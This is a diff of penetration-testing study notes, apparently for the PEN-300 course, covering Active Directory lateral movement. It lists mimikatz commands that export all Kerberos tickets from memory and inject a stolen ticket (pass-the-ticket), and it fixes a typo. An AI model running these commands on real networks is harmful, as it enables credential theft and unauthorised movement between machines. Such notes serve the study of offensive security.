trike33/PEN-300-Code-Snippets/Active Directory/Lateral Movement.md

 Exporting all tickets(TGTs and TGSs) with mimikatz:

-mimikatz # sekurlsa::tickets /export   -> note that the TGTs can only be used from the machine they where generated on, the TGSs can be used elsewhere
+mimikatz # sekurlsa::tickets /export

-Injecting some ticket into memoeyr with mimikatz:
+Injecting some ticket into memory with mimikatz:

 mimikatz # kerberos::ptt 'C:\ticket.kirbi'
 ```